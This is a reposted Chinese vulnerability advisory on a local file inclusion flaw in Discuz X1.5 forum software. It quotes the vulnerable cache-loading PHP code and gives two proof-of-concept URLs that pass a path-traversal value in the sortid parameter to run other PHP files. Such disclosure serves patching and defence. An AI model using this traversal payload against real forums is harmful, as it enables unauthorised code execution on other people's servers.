文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>DISCUZ X1.5 本地文件包含漏洞

DISCUZ X1.5 本地文件包含漏洞

时间:2011-02-28  来源:Jannock

发布日期:2011-02.28
发布作者:Jannock

影响版本:DISCUZ X1.5
官方网站:http://www.discuz.net/

漏洞类型:文件包含
漏洞描述:DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

config_global.php  $_config['cache']['type'] = ‘file’;   function cachedata($cachenames) {  ……  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;  ……  if($isfilecache) {  $lostcaches = array();  foreach($cachenames as $cachename) {  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {  $lostcaches[] = $cachename;  }  }   ……  }  

地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

 

标签分类: 文件包含

相关阅读 更多 +
排行榜 更多 +
毒药轮盘手机版下载

毒药轮盘手机版下载

休闲益智 下载
剑侠情缘零b服手游下载

剑侠情缘零b服手游下载

角色扮演 下载
惊魂动物园游戏手机版下载

惊魂动物园游戏手机版下载

冒险解谜 下载